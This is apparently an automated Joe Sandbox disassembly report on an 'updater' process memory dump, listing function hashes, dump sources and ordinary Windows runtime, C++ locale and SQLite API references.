                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02b6774da5a7a55f2a6389fc43ddd3608afeed8ae3b7978352f916df1d7f7f77
                                  • Instruction ID: e67923b747a5d12bd6caa560ab8f6d3c03cf69a7b6dedfd60659f0a9adb29cbb
                                  • Opcode Fuzzy Hash: 02b6774da5a7a55f2a6389fc43ddd3608afeed8ae3b7978352f916df1d7f7f77
                                  • Instruction Fuzzy Hash: 95027371E00B099FDB17CF6AC850AAEB7B5BF59790F11832AE8157B2A1D730D852CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalCurrentEnterSectionThread
                                  • String ID:
                                  • API String ID: 3488303727-0
                                  • Opcode ID: 675818256719f6a6ac736619fba1cc99eeab91af2acd3cc991f8b57e895c48bb
                                  • Instruction ID: bc82e861645f1b02d589fe1645161a8ba160957030b4549f2e1a350c513ec8cf
                                  • Opcode Fuzzy Hash: 675818256719f6a6ac736619fba1cc99eeab91af2acd3cc991f8b57e895c48bb
                                  • Instruction Fuzzy Hash: 03E10331A04363DFDB15DF38C8866EABBF1FF81324F148A6EE9854A241D7759846CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                  • String ID:
                                  • API String ID: 4283097504-0
                                  • Opcode ID: 39e8132ef45594fbb6ca4847a29c6e0e16abc54317d4f061a252e9767761c3ad
                                  • Instruction ID: 82a1fd9c2fbe2589d8edd9eba4d8a2b2da8afdb7c09604094bb5e2bacfa14bc7
                                  • Opcode Fuzzy Hash: 39e8132ef45594fbb6ca4847a29c6e0e16abc54317d4f061a252e9767761c3ad
                                  • Instruction Fuzzy Hash: A1B119355403028BDB359B29CC91AB7B3E8EF98308F64452EDAC7C76A1E674E586CB10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                  • Instruction ID: 8304dd45d59e79cefa86e015daf241f2d90d8a58ac4b1f8cf903bdb8d7fa8844
                                  • Opcode Fuzzy Hash: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                  • Instruction Fuzzy Hash: C6516071E0012AEFDF05CF99C980AEEBBB2EF88304F59806DE515AB351D7359A51CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5a781e95d9bbaccbb2110fa6cde55ea0ccca5396d88f100734a1fbb5f73754b
                                  • Instruction ID: 0144c13604c8491ec711675f3448ecbae03fbc12c724b26e12429e299ff08d2e
                                  • Opcode Fuzzy Hash: f5a781e95d9bbaccbb2110fa6cde55ea0ccca5396d88f100734a1fbb5f73754b
                                  • Instruction Fuzzy Hash: D521A173F204394B7B0CC47E8C522B9B6E1878C501745823AF8A6EA2C1D968D917E2A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e2528de3e37a2383c09b2fcbedb639cb2713642eff2bb648f9967f84f8b08b7f
                                  • Instruction ID: 698f84a7ffe9b98623d63eea2725d942d72fe13c5b429c55c006eeee41ce8102
                                  • Opcode Fuzzy Hash: e2528de3e37a2383c09b2fcbedb639cb2713642eff2bb648f9967f84f8b08b7f
                                  • Instruction Fuzzy Hash: CF117363F30C255A675C816A8C172BAA5D2EFD815070F533EE826E7284E9A4DE23D390
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction ID: 9d11b53c451f994349c24871a31ca4bd321ef44e46fa27aba89222af785211f5
                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                  • Instruction Fuzzy Hash: BD110BB73811B143E614CA3DC4B4ABBDBD5EAC5221BAE4277F2424BB74D27691C59900
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0dfd36b36dbd786164a676da5fe0137754c35f73489f3e06c4e513949f896c59
                                  • Instruction ID: 4610ff5a54370b93b270bf6a090dc09f213b5ce3b73348bb96271c827ff62d89
                                  • Opcode Fuzzy Hash: 0dfd36b36dbd786164a676da5fe0137754c35f73489f3e06c4e513949f896c59
                                  • Instruction Fuzzy Hash: D52196315250B10AC75C863AA822437BF909B8720738F42AFEFC7ED4C7D529D560DBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0141CEAE
                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0141CEBC
                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0141CECD
                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0141CEDE
                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0141CEEF
                                  • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0141CF00
                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0141CF11
                                  • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0141CF22
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0141CF33
                                  • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0141CF44
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0141CF55
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0141CF66
                                  • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0141CF77
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0141CF88
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0141CF99
                                  • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0141CFAA
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0141CFBB
                                  • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0141CFCC
                                  • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0141CFDD
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0141CFEE
                                  • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0141CFFF
                                  • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0141D010
                                  • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0141D021
                                  • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0141D032
                                  • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0141D043
                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0141D054
                                  • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0141D065
                                  • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0141D076
                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0141D087
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0141D098
                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0141D0A9
                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0141D0BA
                                  • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0141D0CB
                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0141D0DC
                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0141D0ED
                                  • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0141D0FE
                                  • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0141D10F
                                  • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0141D120
                                  • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0141D131
                                  • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0141D142
                                  • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0141D153
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                  • API String ID: 667068680-295688737
                                  • Opcode ID: 5808a20fa129f0a15de0578d967be0217387e7209ca70e2403af8379460c0a4f
                                  • Instruction ID: 5be516526c17961311ff5b0237433c1be43e463b98d01025a046975c0e6fc1f9
                                  • Opcode Fuzzy Hash: 5808a20fa129f0a15de0578d967be0217387e7209ca70e2403af8379460c0a4f
                                  • Instruction Fuzzy Hash: 79619DFA953761ABE7305FF6F80D8863AA8BB19B0B320041BF219D217DDBB540468F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • collate.LIBCPMT ref: 0141AC9A
                                    • Part of subcall function 014199C6: __EH_prolog3_GS.LIBCMT ref: 014199CD
                                    • Part of subcall function 014199C6: __Getcoll.LIBCPMT ref: 01419A31
                                  • __Getcoll.LIBCPMT ref: 0141ACE0
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ACF4
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD09
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD5A
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AE8F
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEA2
                                  • int.LIBCPMT ref: 0141AEAF
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEBF
                                  • int.LIBCPMT ref: 0141AECC
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEDC
                                  • int.LIBCPMT ref: 0141AEE9
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AEF9
                                  • int.LIBCPMT ref: 0141ACBA
                                    • Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
                                    • Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862
                                  • int.LIBCPMT ref: 0141AD1D
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AD47
                                  • int.LIBCPMT ref: 0141AD72
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ADA0
                                  • int.LIBCPMT ref: 0141ADAD
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141ADD4
                                  • int.LIBCPMT ref: 0141ADE1
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AE31
                                  • int.LIBCPMT ref: 0141AE3E
                                  • int.LIBCPMT ref: 0141AF11
                                  • numpunct.LIBCPMT ref: 0141AF38
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF48
                                  • int.LIBCPMT ref: 0141AF55
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF8C
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AF9F
                                  • int.LIBCPMT ref: 0141AFAC
                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0141AFBC
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
                                  • String ID:
                                  • API String ID: 4289308570-0
                                  • Opcode ID: 351f0fcdbf787430a2b36799852e5082a89a250c3ff330fe0afca88272667f8a
                                  • Instruction ID: 6f701371f3b6f2db38cda7fc549bfcf6abc35572afff1b71eb49df7ea90e197f
                                  • Opcode Fuzzy Hash: 351f0fcdbf787430a2b36799852e5082a89a250c3ff330fe0afca88272667f8a
                                  • Instruction Fuzzy Hash: 7291EBB1D023536BEB116FB64C44A7F7AA8FF71A64F14441FF949A72A5EB308D0083A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: a97d45bd3c368b76aa4a5cba375ae4dbea9015448399ff9a1dbec5f2e40ee2db
                                  • Instruction ID: fb871daa616c7630ca0073dadf73d47e88f538318d6ed76039ebc8ef905281ee
                                  • Opcode Fuzzy Hash: a97d45bd3c368b76aa4a5cba375ae4dbea9015448399ff9a1dbec5f2e40ee2db
                                  • Instruction Fuzzy Hash: 89D1CE71D002169FEF21CFA9C880BEEBBF4FF58300F45416EE995A73A1D671A9818B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _strlen.LIBCMT ref: 013F99FA
                                    • Part of subcall function 013FDA52: _strlen.LIBCMT ref: 013FDB9D
                                    • Part of subcall function 013F88F3: _strlen.LIBCMT ref: 013F8929
                                  • _strlen.LIBCMT ref: 013F9A37
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$tbl_name='%q'$view
                                  • API String ID: 4218353326-3984390951
                                  • Opcode ID: a0c1e47d6cd70142f16e4eaa41c1c96757a87e4dde364330e723d3fc57ec9bba
                                  • Instruction ID: 9c65c9d2bfd7fc836abda0339863e25be764065f19c0df852d595c622b8f4b0d
                                  • Opcode Fuzzy Hash: a0c1e47d6cd70142f16e4eaa41c1c96757a87e4dde364330e723d3fc57ec9bba
                                  • Instruction Fuzzy Hash: 4FB19570A00215EFEF14DFA8C885BAEBBB5FF84318F10815DEA05AB291DB71A945CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: dcb295eaf332e5ed26c425019d2c25ed4d972429ee0467fd3931d0a212f1ab4b
                                  • Instruction ID: a650454dd892880b008c507372fde9552a2d53cb6accc1b52727e10525eef8eb
                                  • Opcode Fuzzy Hash: dcb295eaf332e5ed26c425019d2c25ed4d972429ee0467fd3931d0a212f1ab4b
                                  • Instruction Fuzzy Hash: 54C155B2D41205AFDB20DBA9DC86FDE77F8AB6C704F14016AFA04FB291D6B09D418B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: %.16g$%lld$%s(%d)$,...$,nil$collseq(%.20s)$keyinfo(%d$vtab:%p:%p
                                  • API String ID: 4218353326-1567635944
                                  • Opcode ID: 59c8ee657645074e84788ba385f226bf59e7b8256650185bbbe2ec2155be930d
                                  • Instruction ID: a085d27b6abd5a928bfff0d4d0f440cf4a99f53edbdabffe32d870674e0affd9
                                  • Opcode Fuzzy Hash: 59c8ee657645074e84788ba385f226bf59e7b8256650185bbbe2ec2155be930d
                                  • Instruction Fuzzy Hash: EA51F370900715AFDB15CFDDC888EAA7BE4BF4522CF24429AE5219F2E2D771D942CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 013C7535
                                  • GetFileSize.KERNEL32(?,00000000,?,?), ref: 013C75B5
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 013C75CC
                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 013C75DF
                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 013C75EC
                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013C75FF
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 013C7620
                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013C7633
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$PointerRead$HandleInformationSize
                                  • String ID:
                                  • API String ID: 2979504256-0
                                  • Opcode ID: ac5c8ebf119fcffdcf2fdd0382af30bbe9c2ed36a568cce79734315a0ec6f1b1
                                  • Instruction ID: 054da792c31235c25a8318d416f021b247b7e242138b4a72b555b3f32fef8706
                                  • Opcode Fuzzy Hash: ac5c8ebf119fcffdcf2fdd0382af30bbe9c2ed36a568cce79734315a0ec6f1b1
                                  • Instruction Fuzzy Hash: 2A5164B5A01219ABEB24DF69DC81FBEB7B9EB44B54F10482DFA05E7280D630DD058B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 014214EB
                                  • type_info::operator==.LIBVCRUNTIME ref: 01421512
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0142161E
                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 014216F9
                                  • _UnwindNestedFrames.LIBCMT ref: 01421780
                                  • CallUnexpected.LIBVCRUNTIME ref: 0142179B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2123188842-393685449
                                  • Opcode ID: d1e64e02a2a071d2739358abd4cdc8b1c7fe0c66a0fd43179549d3a5b623f89d
                                  • Instruction ID: ab502c4b1df628078b0252a51e2f810affc0851198b9dcbf4fd6e56e85a842a6
                                  • Opcode Fuzzy Hash: d1e64e02a2a071d2739358abd4cdc8b1c7fe0c66a0fd43179549d3a5b623f89d
                                  • Instruction Fuzzy Hash: 81C19B75D0022A9FCF25DFA9C8809AFBBB5BF94B10F84405BE9056B321D731D992CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
